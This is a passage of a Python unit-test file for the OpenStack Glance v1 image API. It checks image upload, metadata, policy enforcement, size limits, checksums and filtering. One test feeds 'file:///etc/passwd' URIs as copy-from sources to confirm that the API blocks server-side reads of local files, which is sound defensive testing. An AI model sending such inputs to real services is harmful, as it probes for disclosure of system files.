self.config(show_multiple_locations=True)
self._add_check_no_url_info()
def test_add_check_no_url_info_both_off(self):
self._add_check_no_url_info()
def test_add_image_zero_size(self):
"""Tests creating an active image with explicitly zero size"""
fixture_headers = {'x-image-meta-disk-format': 'ami',
'x-image-meta-container-format': 'ami',
'x-image-meta-size': '0',
'x-image-meta-name': 'empty image'}
req = webob.Request.blank("/images")
req.method = 'POST'
for k, v in fixture_headers.iteritems():
req.headers[k] = v
res = req.get_response(self.api)
self.assertEquals(res.status_int, 201)
res_body = json.loads(res.body)['image']
self.assertEquals('active', res_body['status'])
image_id = res_body['id']
# GET empty image
req = webob.Request.blank("/images/%s" % image_id)
res = req.get_response(self.api)
self.assertEqual(res.status_int, 200)
self.assertEqual(len(res.body), 0)
def _do_test_add_image_attribute_mismatch(self, attributes):
fixture_headers = {
'x-image-meta-name': 'fake image #3',
}
fixture_headers.update(attributes)
req = webob.Request.blank("/images")
req.method = 'POST'
for k, v in fixture_headers.iteritems():
req.headers[k] = v
req.headers['Content-Type'] = 'application/octet-stream'
req.body = "XXXX"
res = req.get_response(self.api)
self.assertEquals(res.status_int, 400)
def test_add_image_checksum_mismatch(self):
attributes = {
'x-image-meta-checksum': 'asdf',
}
self._do_test_add_image_attribute_mismatch(attributes)
def test_add_image_size_mismatch(self):
attributes = {
'x-image-meta-size': str(len("XXXX") + 1),
}
self._do_test_add_image_attribute_mismatch(attributes)
def test_add_image_checksum_and_size_mismatch(self):
attributes = {
'x-image-meta-checksum': 'asdf',
'x-image-meta-size': str(len("XXXX") + 1),
}
self._do_test_add_image_attribute_mismatch(attributes)
def test_add_image_bad_store(self):
"""Tests raises BadRequest for invalid store header"""
fixture_headers = {'x-image-meta-store': 'bad',
'x-image-meta-name': 'fake image #3'}
req = webob.Request.blank("/images")
req.method = 'POST'
for k, v in fixture_headers.iteritems():
req.headers[k] = v
req.headers['Content-Type'] = 'application/octet-stream'
req.body = "chunk00000remainder"
res = req.get_response(self.api)
self.assertEquals(res.status_int, 400)
def test_add_image_basic_file_store(self):
"""Tests to add a basic image in the file store"""
fixture_headers = {'x-image-meta-store': 'file',
'x-image-meta-disk-format': 'vhd',
'x-image-meta-container-format': 'ovf',
'x-image-meta-name': 'fake image #3'}
req = webob.Request.blank("/images")
req.method = 'POST'
for k, v in fixture_headers.iteritems():
req.headers[k] = v
req.headers['Content-Type'] = 'application/octet-stream'
req.body = "chunk00000remainder"
res = req.get_response(self.api)
self.assertEquals(res.status_int, 201)
# Test that the Location: header is set to the URI to
# edit the newly-created image, as required by APP.
# See LP Bug #719825
self.assertTrue('location' in res.headers,
"'location' not in response headers.\n"
"res.headerlist = %r" % res.headerlist)
res_body = json.loads(res.body)['image']
self.assertTrue('/images/%s' % res_body['id']
in res.headers['location'])
self.assertEquals('active', res_body['status'])
image_id = res_body['id']
# Test that we are NOT able to edit the Location field
# per LP Bug #911599
req = webob.Request.blank("/images/%s" % image_id)
req.method = 'PUT'
req.headers['x-image-meta-location'] = 'http://example.com/images/123'
res = req.get_response(self.api)
self.assertEquals(res.status_int, 400)
def test_add_image_unauthorized(self):
rules = {"add_image": '!'}
self.set_policy_rules(rules)
fixture_headers = {'x-image-meta-store': 'file',
'x-image-meta-disk-format': 'vhd',
'x-image-meta-container-format': 'ovf',
'x-image-meta-name': 'fake image #3'}
req = webob.Request.blank("/images")
req.method = 'POST'
for k, v in fixture_headers.iteritems():
req.headers[k] = v
req.headers['Content-Type'] = 'application/octet-stream'
req.body = "chunk00000remainder"
res = req.get_response(self.api)
self.assertEquals(res.status_int, 403)
def test_add_publicize_image_unauthorized(self):
rules = {"add_image": '@', "modify_image": '@',
"publicize_image": '!'}
self.set_policy_rules(rules)
fixture_headers = {'x-image-meta-store': 'file',
'x-image-meta-is-public': 'true',
'x-image-meta-disk-format': 'vhd',
'x-image-meta-container-format': 'ovf',
'x-image-meta-name': 'fake image #3'}
req = webob.Request.blank("/images")
req.method = 'POST'
for k, v in fixture_headers.iteritems():
req.headers[k] = v
req.headers['Content-Type'] = 'application/octet-stream'
req.body = "chunk00000remainder"
res = req.get_response(self.api)
self.assertEquals(res.status_int, 403)
def test_add_publicize_image_authorized(self):
rules = {"add_image": '@', "modify_image": '@',
"publicize_image": '@'}
self.set_policy_rules(rules)
fixture_headers = {'x-image-meta-store': 'file',
'x-image-meta-is-public': 'true',
'x-image-meta-disk-format': 'vhd',
'x-image-meta-container-format': 'ovf',
'x-image-meta-name': 'fake image #3'}
req = webob.Request.blank("/images")
req.method = 'POST'
for k, v in fixture_headers.iteritems():
req.headers[k] = v
req.headers['Content-Type'] = 'application/octet-stream'
req.body = "chunk00000remainder"
res = req.get_response(self.api)
self.assertEquals(res.status_int, 201)
def test_add_copy_from_image_unauthorized(self):
rules = {"add_image": '@', "copy_from": '!'}
self.set_policy_rules(rules)
fixture_headers = {'x-image-meta-store': 'file',
'x-image-meta-disk-format': 'vhd',
'x-glance-api-copy-from': 'http://glance.com/i.ovf',
'x-image-meta-container-format': 'ovf',
'x-image-meta-name': 'fake image #F'}
req = webob.Request.blank("/images")
req.method = 'POST'
for k, v in fixture_headers.iteritems():
req.headers[k] = v
req.headers['Content-Type'] = 'application/octet-stream'
req.body = "chunk00000remainder"
res = req.get_response(self.api)
self.assertEquals(res.status_int, 403)
def test_add_copy_from_image_authorized(self):
rules = {"add_image": '@', "copy_from": '@'}
self.set_policy_rules(rules)
fixture_headers = {'x-image-meta-store': 'file',
'x-image-meta-disk-format': 'vhd',
'x-glance-api-copy-from': 'http://glance.com/i.ovf',
'x-image-meta-container-format': 'ovf',
'x-image-meta-name': 'fake image #F'}
req = webob.Request.blank("/images")
req.method = 'POST'
for k, v in fixture_headers.iteritems():
req.headers[k] = v
req.headers['Content-Type'] = 'application/octet-stream'
res = req.get_response(self.api)
self.assertEquals(res.status_int, 201)
def test_add_copy_from_with_nonempty_body(self):
"""Tests creates an image from copy-from and nonempty body"""
fixture_headers = {'x-image-meta-store': 'file',
'x-image-meta-disk-format': 'vhd',
'x-glance-api-copy-from': 'http://a/b/c.ovf',
'x-image-meta-container-format': 'ovf',
'x-image-meta-name': 'fake image #F'}
req = webob.Request.blank("/images")
req.headers['Content-Type'] = 'application/octet-stream'
req.method = 'POST'
req.body = "chunk00000remainder"
for k, v in fixture_headers.iteritems():
req.headers[k] = v
res = req.get_response(self.api)
self.assertEquals(res.status_int, 400)
def test_add_location_with_nonempty_body(self):
"""Tests creates an image from location and nonempty body"""
fixture_headers = {'x-image-meta-store': 'file',
'x-image-meta-disk-format': 'vhd',
'x-image-meta-location': 'http://a/b/c.tar.gz',
'x-image-meta-container-format': 'ovf',
'x-image-meta-name': 'fake image #F'}
req = webob.Request.blank("/images")
req.headers['Content-Type'] = 'application/octet-stream'
req.method = 'POST'
req.body = "chunk00000remainder"
for k, v in fixture_headers.iteritems():
req.headers[k] = v
res = req.get_response(self.api)
self.assertEquals(res.status_int, 400)
def test_add_location_with_conflict_image_size(self):
"""Tests creates an image from location and conflict image size"""
self.stubs.Set(glance.api.v1.images, 'get_size_from_backend',
lambda *args, **kwargs: 2)
fixture_headers = {'x-image-meta-store': 'file',
'x-image-meta-disk-format': 'vhd',
'x-image-meta-location': 'http://a/b/c.tar.gz',
'x-image-meta-container-format': 'ovf',
'x-image-meta-name': 'fake image #F',
'x-image-meta-size': '1'}
req = webob.Request.blank("/images")
req.headers['Content-Type'] = 'application/octet-stream'
req.method = 'POST'
for k, v in fixture_headers.iteritems():
req.headers[k] = v
res = req.get_response(self.api)
self.assertEquals(res.status_int, 409)
def test_add_copy_from_with_location(self):
"""Tests creates an image from copy-from and location"""
fixture_headers = {'x-image-meta-store': 'file',
'x-image-meta-disk-format': 'vhd',
'x-glance-api-copy-from': 'http://a/b/c.ovf',
'x-image-meta-container-format': 'ovf',
'x-image-meta-name': 'fake image #F',
'x-image-meta-location': 'http://a/b/c.tar.gz'}
req = webob.Request.blank("/images")
req.method = 'POST'
for k, v in fixture_headers.iteritems():
req.headers[k] = v
res = req.get_response(self.api)
self.assertEquals(res.status_int, 400)
def _do_test_post_image_content_missing_format(self, missing):
"""Tests creation of an image with missing format"""
fixture_headers = {'x-image-meta-store': 'file',
'x-image-meta-disk-format': 'vhd',
'x-image-meta-container-format': 'ovf',
'x-image-meta-name': 'fake image #3'}
header = 'x-image-meta-' + missing.replace('_', '-')
del fixture_headers[header]
req = webob.Request.blank("/images")
req.method = 'POST'
for k, v in fixture_headers.iteritems():
req.headers[k] = v
req.headers['Content-Type'] = 'application/octet-stream'
req.body = "chunk00000remainder"
res = req.get_response(self.api)
self.assertEqual(res.status_int, 400)
def test_add_copy_from_with_restricted_sources(self):
"""Tests creates an image from copy-from with restricted sources"""
header_template = {'x-image-meta-store': 'file',
'x-image-meta-disk-format': 'vhd',
'x-image-meta-container-format': 'ovf',
'x-image-meta-name': 'fake image #F'}
schemas = ["file:///etc/passwd",
"swift+config:///xxx",
"filesystem:///etc/passwd"]
for schema in schemas:
req = webob.Request.blank("/images")
req.method = 'POST'
for k, v in six.iteritems(header_template):
req.headers[k] = v
req.headers['x-glance-api-copy-from'] = schema
res = req.get_response(self.api)
self.assertEqual(400, res.status_int)
def test_post_image_content_missing_disk_format(self):
"""Tests creation of an image with missing disk format"""
self._do_test_post_image_content_missing_format('disk_format')
def test_post_image_content_missing_container_type(self):
"""Tests creation of an image with missing container format"""
self._do_test_post_image_content_missing_format('container_format')
def _do_test_put_image_content_missing_format(self, missing):
"""Tests delayed activation of an image with missing format"""
fixture_headers = {'x-image-meta-store': 'file',
'x-image-meta-disk-format': 'vhd',
'x-image-meta-container-format': 'ovf',
'x-image-meta-name': 'fake image #3'}
header = 'x-image-meta-' + missing.replace('_', '-')
del fixture_headers[header]
req = webob.Request.blank("/images")
req.method = 'POST'
for k, v in fixture_headers.iteritems():
req.headers[k] = v
res = req.get_response(self.api)
self.assertEquals(res.status_int, 201)
res_body = json.loads(res.body)['image']
self.assertEquals('queued', res_body['status'])
image_id = res_body['id']
req = webob.Request.blank("/images/%s" % image_id)
req.method = 'PUT'
for k, v in fixture_headers.iteritems():
req.headers[k] = v
req.headers['Content-Type'] = 'application/octet-stream'
req.body = "chunk00000remainder"
res = req.get_response(self.api)
self.assertEquals(res.status_int, 400)
def test_put_image_content_missing_disk_format(self):
"""Tests delayed activation of image with missing disk format"""
self._do_test_put_image_content_missing_format('disk_format')
def test_put_image_content_missing_container_type(self):
"""Tests delayed activation of image with missing container format"""
self._do_test_put_image_content_missing_format('container_format')
def test_update_deleted_image(self):
"""Tests that exception raised trying to update a deleted image"""
req = webob.Request.blank("/images/%s" % UUID2)
req.method = 'DELETE'
res = req.get_response(self.api)
self.assertEquals(res.status_int, 200)
fixture = {'name': 'test_del_img'}
req = webob.Request.blank('/images/%s' % UUID2)
req.method = 'PUT'
req.content_type = 'application/json'
req.body = json.dumps(dict(image=fixture))
res = req.get_response(self.api)
self.assertEquals(res.status_int, 403)
self.assertTrue('Forbidden to update deleted image' in res.body)
def test_delete_deleted_image(self):
"""Tests that exception raised trying to delete a deleted image"""
req = webob.Request.blank("/images/%s" % UUID2)
req.method = 'DELETE'
res = req.get_response(self.api)
self.assertEquals(res.status_int, 200)
# Verify the status is deleted
req = webob.Request.blank("/images/%s" % UUID2)
req.method = 'HEAD'
res = req.get_response(self.api)
self.assertEquals(res.status_int, 200)
self.assertEqual("deleted", res.headers['x-image-meta-status'])
req = webob.Request.blank("/images/%s" % UUID2)
req.method = 'DELETE'
res = req.get_response(self.api)
self.assertEquals(res.status_int, 404)
msg = "Image %s not found." % UUID2
self.assertTrue(msg in res.body)
# Verify the status is still deleted
req = webob.Request.blank("/images/%s" % UUID2)
req.method = 'HEAD'
res = req.get_response(self.api)
self.assertEquals(res.status_int, 200)
self.assertEqual("deleted", res.headers['x-image-meta-status'])
def test_delete_pending_delete_image(self):
"""
Tests that correct response returned when deleting
a pending_delete image
"""
# First deletion
self.config(delayed_delete=True, scrubber_datadir='/tmp/scrubber')
req = webob.Request.blank("/images/%s" % UUID2)
req.method = 'DELETE'
res = req.get_response(self.api)
self.assertEquals(res.status_int, 200)
# Verify the status is pending_delete
req = webob.Request.blank("/images/%s" % UUID2)
req.method = 'HEAD'
res = req.get_response(self.api)
self.assertEquals(res.status_int, 200)
self.assertEqual("pending_delete", res.headers['x-image-meta-status'])
# Second deletion
req = webob.Request.blank("/images/%s" % UUID2)
req.method = 'DELETE'
res = req.get_response(self.api)
self.assertEquals(res.status_int, 403)
self.assertTrue('Forbidden to delete a pending_delete image'
in res.body)
# Verify the status is still pending_delete
req = webob.Request.blank("/images/%s" % UUID2)
req.method = 'HEAD'
res = req.get_response(self.api)
self.assertEquals(res.status_int, 200)
self.assertEqual("pending_delete", res.headers['x-image-meta-status'])
def test_register_and_upload(self):
"""
Test that the process of registering an image with
some metadata, then uploading an image file with some
more metadata doesn't mark the original metadata deleted
:see LP Bug#901534
"""
fixture_headers = {'x-image-meta-store': 'file',
'x-image-meta-disk-format': 'vhd',
'x-image-meta-container-format': 'ovf',
'x-image-meta-name': 'fake image #3',
'x-image-meta-property-key1': 'value1'}
req = webob.Request.blank("/images")
req.method = 'POST'
for k, v in fixture_headers.iteritems():
req.headers[k] = v
res = req.get_response(self.api)
self.assertEquals(res.status_int, 201)
res_body = json.loads(res.body)['image']
self.assertTrue('id' in res_body)
image_id = res_body['id']
self.assertTrue('/images/%s' % image_id in res.headers['location'])
# Verify the status is queued
self.assertTrue('status' in res_body)
self.assertEqual('queued', res_body['status'])
# Check properties are not deleted
self.assertTrue('properties' in res_body)
self.assertTrue('key1' in res_body['properties'])
self.assertEqual('value1', res_body['properties']['key1'])
# Now upload the image file along with some more
# metadata and verify original metadata properties
# are not marked deleted
req = webob.Request.blank("/images/%s" % image_id)
req.method = 'PUT'
req.headers['Content-Type'] = 'application/octet-stream'
req.headers['x-image-meta-property-key2'] = 'value2'
req.body = "chunk00000remainder"
res = req.get_response(self.api)
self.assertEquals(res.status_int, 200)
# Verify the status is queued
req = webob.Request.blank("/images/%s" % image_id)
req.method = 'HEAD'
res = req.get_response(self.api)
self.assertEquals(res.status_int, 200)
self.assertTrue('x-image-meta-property-key1' in res.headers,
"Did not find required property in headers. "
"Got headers: %r" % res.headers)
self.assertEqual("active", res.headers['x-image-meta-status'])
def test_disable_purge_props(self):
"""
        Test that the special x-glance-registry-purge-props header controls
the purge property behaviour of the registry.
:see LP Bug#901534
"""
fixture_headers = {'x-image-meta-store': 'file',
'x-image-meta-disk-format': 'vhd',
'x-image-meta-container-format': 'ovf',
'x-image-meta-name': 'fake image #3',
'x-image-meta-property-key1': 'value1'}
req = webob.Request.blank("/images")
req.method = 'POST'
for k, v in fixture_headers.iteritems():
req.headers[k] = v
req.headers['Content-Type'] = 'application/octet-stream'
req.body = "chunk00000remainder"
res = req.get_response(self.api)
self.assertEquals(res.status_int, 201)
res_body = json.loads(res.body)['image']
self.assertTrue('id' in res_body)
image_id = res_body['id']
self.assertTrue('/images/%s' % image_id in res.headers['location'])
# Verify the status is queued
self.assertTrue('status' in res_body)
self.assertEqual('active', res_body['status'])
# Check properties are not deleted
self.assertTrue('properties' in res_body)
self.assertTrue('key1' in res_body['properties'])
self.assertEqual('value1', res_body['properties']['key1'])
# Now update the image, setting new properties without
# passing the x-glance-registry-purge-props header and
# verify that original properties are marked deleted.
req = webob.Request.blank("/images/%s" % image_id)
req.method = 'PUT'
req.headers['x-image-meta-property-key2'] = 'value2'
res = req.get_response(self.api)
self.assertEquals(res.status_int, 200)
# Verify the original property no longer in headers
req = webob.Request.blank("/images/%s" % image_id)
req.method = 'HEAD'
res = req.get_response(self.api)
self.assertEquals(res.status_int, 200)
self.assertTrue('x-image-meta-property-key2' in res.headers,
"Did not find required property in headers. "
"Got headers: %r" % res.headers)
self.assertFalse('x-image-meta-property-key1' in res.headers,
"Found property in headers that was not expected. "
"Got headers: %r" % res.headers)
# Now update the image, setting new properties and
# passing the x-glance-registry-purge-props header with
# a value of "false" and verify that second property
# still appears in headers.
req = webob.Request.blank("/images/%s" % image_id)
req.method = 'PUT'
req.headers['x-image-meta-property-key3'] = 'value3'
req.headers['x-glance-registry-purge-props'] = 'false'
res = req.get_response(self.api)
self.assertEquals(res.status_int, 200)
# Verify the second and third property in headers
req = webob.Request.blank("/images/%s" % image_id)
req.method = 'HEAD'
res = req.get_response(self.api)
self.assertEquals(res.status_int, 200)
self.assertTrue('x-image-meta-property-key2' in res.headers,
"Did not find required property in headers. "
"Got headers: %r" % res.headers)
self.assertTrue('x-image-meta-property-key3' in res.headers,
"Did not find required property in headers. "
"Got headers: %r" % res.headers)
def test_publicize_image_unauthorized(self):
"""Create a non-public image then fail to make public"""
rules = {"add_image": '@', "publicize_image": '!'}
self.set_policy_rules(rules)
fixture_headers = {'x-image-meta-store': 'file',
'x-image-meta-disk-format': 'vhd',
'x-image-meta-is-public': 'false',
'x-image-meta-container-format': 'ovf',
'x-image-meta-name': 'fake image #3'}
req = webob.Request.blank("/images")
req.method = 'POST'
for k, v in fixture_headers.iteritems():
req.headers[k] = v
res = req.get_response(self.api)
self.assertEquals(res.status_int, 201)
res_body = json.loads(res.body)['image']
req = webob.Request.blank("/images/%s" % res_body['id'])
req.method = 'PUT'
req.headers['x-image-meta-is-public'] = 'true'
res = req.get_response(self.api)
self.assertEquals(res.status_int, 403)
def test_update_image_size_header_too_big(self):
"""Tests raises BadRequest for supplied image size that is too big"""
fixture_headers = {'x-image-meta-size': CONF.image_size_cap + 1}
req = webob.Request.blank("/images/%s" % UUID2)
req.method = 'PUT'
for k, v in fixture_headers.iteritems():
req.headers[k] = v
res = req.get_response(self.api)
self.assertEquals(res.status_int, 400)
def test_update_image_size_data_too_big(self):
self.config(image_size_cap=512)
fixture_headers = {'content-type': 'application/octet-stream'}
req = webob.Request.blank("/images/%s" % UUID2)
req.method = 'PUT'
req.body = 'X' * (CONF.image_size_cap + 1)
for k, v in fixture_headers.iteritems():
req.headers[k] = v
res = req.get_response(self.api)
self.assertEquals(res.status_int, 400)
def test_update_image_size_chunked_data_too_big(self):
self.config(image_size_cap=512)
# Create new image that has no data
req = webob.Request.blank("/images")
req.method = 'POST'
req.headers['x-image-meta-name'] = 'something'
req.headers['x-image-meta-container_format'] = 'ami'
req.headers['x-image-meta-disk_format'] = 'ami'
res = req.get_response(self.api)
image_id = json.loads(res.body)['image']['id']
fixture_headers = {
'content-type': 'application/octet-stream',
'transfer-encoding': 'chunked',
}
req = webob.Request.blank("/images/%s" % image_id)
req.method = 'PUT'
req.body_file = StringIO.StringIO('X' * (CONF.image_size_cap + 1))
for k, v in fixture_headers.iteritems():
req.headers[k] = v
res = req.get_response(self.api)
self.assertEquals(res.status_int, 413)
def test_update_non_existing_image(self):
self.config(image_size_cap=100)
req = webob.Request.blank("images/%s" % _gen_uuid)
req.method = 'PUT'
req.body = 'test'
req.headers['x-image-meta-name'] = 'test'
req.headers['x-image-meta-container_format'] = 'ami'
req.headers['x-image-meta-disk_format'] = 'ami'
req.headers['x-image-meta-is_public'] = 'False'
res = req.get_response(self.api)
self.assertEqual(res.status_int, 404)
def test_update_public_image(self):
fixture_headers = {'x-image-meta-store': 'file',
'x-image-meta-disk-format': 'vhd',
'x-image-meta-is-public': 'true',
'x-image-meta-container-format': 'ovf',
'x-image-meta-name': 'fake image #3'}
req = webob.Request.blank("/images")
req.method = 'POST'
for k, v in fixture_headers.iteritems():
req.headers[k] = v
res = req.get_response(self.api)
self.assertEquals(res.status_int, 201)
res_body = json.loads(res.body)['image']
req = webob.Request.blank("/images/%s" % res_body['id'])
req.method = 'PUT'
req.headers['x-image-meta-name'] = 'updated public image'
res = req.get_response(self.api)
self.assertEquals(res.status_int, 200)
def test_get_index_sort_name_asc(self):
"""
        Tests that the /images registry API returns the list of
public images sorted alphabetically by name in
ascending order.
"""
UUID3 = _gen_uuid()
extra_fixture = {'id': UUID3,
'status': 'active',
'is_public': True,
'disk_format': 'vhd',
'container_format': 'ovf',
'name': 'asdf',
'size': 19,
'checksum': None}
db_api.image_create(self.context, extra_fixture)
UUID4 = _gen_uuid()
extra_fixture = {'id': UUID4,
'status': 'active',
'is_public': True,
'disk_format': 'vhd',
'container_format': 'ovf',
'name': 'xyz',
'size': 20,
'checksum': None}
db_api.image_create(self.context, extra_fixture)
req = webob.Request.blank('/images?sort_key=name&sort_dir=asc')
res = req.get_response(self.api)
self.assertEquals(res.status_int, 200)
res_dict = json.loads(res.body)
images = res_dict['images']
self.assertEquals(len(images), 3)
self.assertEquals(images[0]['id'], UUID3)
self.assertEquals(images[1]['id'], UUID2)
self.assertEquals(images[2]['id'], UUID4)
def test_get_details_filter_changes_since(self):
"""
        Tests that the /images/detail registry API returns the list of
        public images filtered by the changes-since parameter
"""
dt1 = timeutils.utcnow() - datetime.timedelta(1)
iso1 = timeutils.isotime(dt1)
date_only1 = dt1.strftime('%Y-%m-%d')
date_only2 = dt1.strftime('%Y%m%d')
date_only3 = dt1.strftime('%Y-%m%d')
dt2 = timeutils.utcnow() + datetime.timedelta(1)
iso2 = timeutils.isotime(dt2)
image_ts = timeutils.utcnow() + datetime.timedelta(2)
hour_before = image_ts.strftime('%Y-%m-%dT%H:%M:%S%%2B01:00')
hour_after = image_ts.strftime('%Y-%m-%dT%H:%M:%S-01:00')
dt4 = timeutils.utcnow() + datetime.timedelta(3)
iso4 = timeutils.isotime(dt4)
UUID3 = _gen_uuid()
extra_fixture = {'id': UUID3,
'status': 'active',
'is_public': True,
'disk_format': 'vhd',
'container_format': 'ovf',
'name': 'fake image #3',
'size': 18,
'checksum': None}
db_api.image_create(self.context, extra_fixture)
db_api.image_destroy(self.context, UUID3)
UUID4 = _gen_uuid()
extra_fixture = {'id': UUID4,
'status': 'active',
'is_public': True,
'disk_format': 'ami',
'container_format': 'ami',
'name': 'fake image #4',
'size': 20,
'checksum': None,
'created_at': image_ts,
'updated_at': image_ts}
db_api.image_create(self.context, extra_fixture)
# Check a standard list, 4 images in db (2 deleted)
req = webob.Request.blank('/images/detail')
res = req.get_response(self.api)
self.assertEquals(res.status_int, 200)
res_dict = json.loads(res.body)
images = res_dict['images']
self.assertEquals(len(images), 2)
self.assertEqual(images[0]['id'], UUID4)
self.assertEqual(images[1]['id'], UUID2)
# Expect 3 images (1 deleted)
req = webob.Request.blank('/images/detail?changes-since=%s' % iso1)
res = req.get_response(self.api)
self.assertEquals(res.status_int, 200)
res_dict = json.loads(res.body)
images = res_dict['images']
self.assertEquals(len(images), 3)
self.assertEqual(images[0]['id'], UUID4)
self.assertEqual(images[1]['id'], UUID3) # deleted
self.assertEqual(images[2]['id'], UUID2)
# Expect 1 images (0 deleted)
req = webob.Request.blank('/images/detail?changes-since=%s' % iso2)
res = req.get_response(self.api)
self.assertEquals(res.status_int, 200)
res_dict = json.loads(res.body)
images = res_dict['images']
self.assertEquals(len(images), 1)
self.assertEqual(images[0]['id'], UUID4)
# Expect 1 images (0 deleted)
req = webob.Request.blank('/images/detail?changes-since=%s' %
hour_before)
res = req.get_response(self.api)
self.assertEquals(res.status_int, 200)
res_dict = json.loads(res.body)
images = res_dict['images']
self.assertEquals(len(images), 1)
self.assertEqual(images[0]['id'], UUID4)
# Expect 0 images (0 deleted)
req = webob.Request.blank('/images/detail?changes-since=%s' %
hour_after)
res = req.get_response(self.api)
self.assertEquals(res.status_int, 200)
res_dict = json.loads(res.body)
images = res_dict['images']
self.assertEquals(len(images), 0)
# Expect 0 images (0 deleted)
req = webob.Request.blank('/images/detail?changes-since=%s' % iso4)
res = req.get_response(self.api)
self.assertEquals(res.status_int, 200)
res_dict = json.loads(res.body)
images = res_dict['images']
self.assertEquals(len(images), 0)
for param in [date_only1, date_only2, date_only3]:
# Expect 3 images (1 deleted)
req = webob.Request.blank('/images/detail?changes-since=%s' %
param)
res = req.get_response(self.api)
self.assertEquals(res.status_int, 200)
res_dict = json.loads(res.body)
images = res_dict['images']
self.assertEquals(len(images), 3)
self.assertEqual(images[0]['id'], UUID4)
self.assertEqual(images[1]['id'], UUID3) # deleted
self.assertEqual(images[2]['id'], UUID2)
# Bad request (empty changes-since param)
req = webob.Request.blank('/images/detail?changes-since=')
res = req.get_response(self.api)
self.assertEquals(res.status_int, 400)
def test_get_images_bad_urls(self):
"""Check that routes collections are not on (LP bug 1185828)"""
req = webob.Request.blank('/images/detail.xxx')
res = req.get_response(self.api)
self.assertEquals(res.status_int, 404)
req = webob.Request.blank('/images.xxx')
res = req.get_response(self.api)
self.assertEquals(res.status_int, 404)
req = webob.Request.blank('/images/new')
res = req.get_response(self.api)
self.assertEquals(res.status_int, 404)
req = webob.Request.blank("/images/%s/members" % UUID1)
res = req.get_response(self.api)
self.assertEquals(res.status_int, 200)
req = webob.Request.blank("/images/%s/members.xxx" % UUID1)
res = req.get_response(self.api)
self.assertEquals(res.status_int, 404)
def test_get_images_detailed_unauthorized(self):
rules = {"get_images": '!'}
self.set_policy_rules(rules)
req = webob.Request.blank('/images/detail')
res = req.get_response(self.api)
self.assertEquals(res.status_int, 403)
def test_get_images_unauthorized(self):
rules = {"get_images": '!'}
self.set_policy_rules(rules)
req = webob.Request.blank('/images/detail')
res = req.get_response(self.api)
self.assertEquals(res.status_int, 403)
def test_store_location_not_revealed(self):
"""
Test that the internal store location is NOT revealed
through the API server
"""
# Check index and details...
for url in ('/images', '/images/detail'):
req = webob.Request.blank(url)
res = req.get_response(self.api)
self.assertEquals(res.status_int, 200)
res_dict = json.loads(res.body)
images = res_dict['images']
num_locations = sum([1 for record in images
if 'location' in record.keys()])
self.assertEquals(0, num_locations, images)
# Check GET
req = webob.Request.blank("/images/%s" % UUID2)
res = req.get_response(self.api)
self.assertEqual(res.status_int, 200)
self.assertFalse('X-Image-Meta-Location' in res.headers)
# Check HEAD
req = webob.Request.blank("/images/%s" % UUID2)
req.method = 'HEAD'
res = req.get_response(self.api)
self.assertEqual(res.status_int, 200)
self.assertFalse('X-Image-Meta-Location' in res.headers)
# Check PUT
req = webob.Request.blank("/images/%s" % UUID2)
req.body = res.body
req.method = 'PUT'
res = req.get_response(self.api)
self.assertEqual(res.status_int, 200)
res_body = json.loads(res.body)
self.assertFalse('location' in res_body['image'])
# Check POST
req = webob.Request.blank("/images")
headers = {'x-image-meta-location': 'http://localhost',
'x-image-meta-disk-format': 'vhd',
'x-image-meta-container-format': 'ovf',
'x-image-meta-name': 'fake image #3'}
for k, v in headers.iteritems():
req.headers[k] = v
req.method = 'POST'
res = req.get_response(self.api)
self.assertEqual(res.status_int, 201)
res_body = json.loads(res.body)
self.assertFalse('location' in res_body['image'])
def test_image_is_checksummed(self):
"""Test that the image contents are checksummed properly"""
fixture_headers = {'x-image-meta-store': 'file',
'x-image-meta-disk-format': 'vhd',
'x-image-meta-container-format': 'ovf',
'x-image-meta-name': 'fake image #3'}
image_contents = "chunk00000remainder"
image_checksum = hashlib.md5(image_contents).hexdigest()
req = webob.Request.blank("/images")
req.method = 'POST'
for k, v in fixture_headers.iteritems():
req.headers[k] = v
req.headers['Content-Type'] = 'application/octet-stream'
req.body = image_contents
res = req.get_response(self.api)
self.assertEquals(res.status_int, 201)
res_body = json.loads(res.body)['image']
self.assertEquals(image_checksum, res_body['checksum'],
"Mismatched checksum. Expected %s, got %s" %
(image_checksum, res_body['checksum']))
def test_etag_equals_checksum_header(self):
"""Test that the ETag header matches the x-image-meta-checksum"""
fixture_headers = {'x-image-meta-store': 'file',
'x-image-meta-disk-format': 'vhd',
'x-image-meta-container-format': 'ovf',
'x-image-meta-name': 'fake image #3'}
image_contents = "chunk00000remainder"
image_checksum = hashlib.md5(image_contents).hexdigest()
req = webob.Request.blank("/images")
req.method = 'POST'
for k, v in fixture_headers.iteritems():
req.headers[k] = v
req.headers['Content-Type'] = 'application/octet-stream'
req.body = image_contents
res = req.get_response(self.api)
self.assertEquals(res.status_int, 201)
image = json.loads(res.body)['image']
# HEAD the image and check the ETag equals the checksum header...
expected_headers = {'x-image-meta-checksum': image_checksum,
'etag': image_checksum}
req = webob.Request.blank("/images/%s" % image['id'])
req.method = 'HEAD'
res = req.get_response(self.api)
self.assertEquals(res.status_int, 200)
for key in expected_headers.keys():
self.assertTrue(key in res.headers,
"required header '%s' missing from "
"returned headers" % key)
for key, value in expected_headers.iteritems():
self.assertEquals(value, res.headers[key])
def test_bad_checksum_prevents_image_creation(self):
"""Test that the image contents are checksummed properly"""
image_contents = "chunk00000remainder"
bad_checksum = hashlib.md5("invalid").hexdigest()
fixture_headers = {'x-image-meta-store': 'file',
'x-image-meta-disk-format': 'vhd',
'x-image-meta-container-format': 'ovf',
'x-image-meta-name': 'fake image #3',
'x-image-meta-checksum': bad_checksum,
'x-image-meta-is-public': 'true'}
req = webob.Request.blank("/images")
req.method = 'POST'
for k, v in fixture_headers.iteritems():
req.headers[k] = v
req.headers['Content-Type'] = 'application/octet-stream'
req.body = image_contents
res = req.get_response(self.api)
self.assertEquals(res.status_int, 400)
# Test that only one image was returned (that already exists)
req = webob.Request.blank("/images")
req.method = 'GET'
res = req.get_response(self.api)
self.assertEquals(res.status_int, 200)
images = json.loads(res.body)['images']
self.assertEqual(len(images), 1)
def test_image_meta(self):
"""Test for HEAD /images/<ID>"""
expected_headers = {'x-image-meta-id': UUID2,
'x-image-meta-name': 'fake image #2'}
req = webob.Request.blank("/images/%s" % UUID2)
req.method = 'HEAD'
res = req.get_response(self.api)
self.assertEquals(res.status_int, 200)
for key, value in expected_headers.iteritems():
self.assertEquals(value, res.headers[key])
def test_image_meta_unauthorized(self):
rules = {"get_image": '!'}
self.set_policy_rules(rules)
req = webob.Request.blank("/images/%s" % UUID2)
req.method = 'HEAD'
res = req.get_response(self.api)
self.assertEquals(res.status_int, 403)
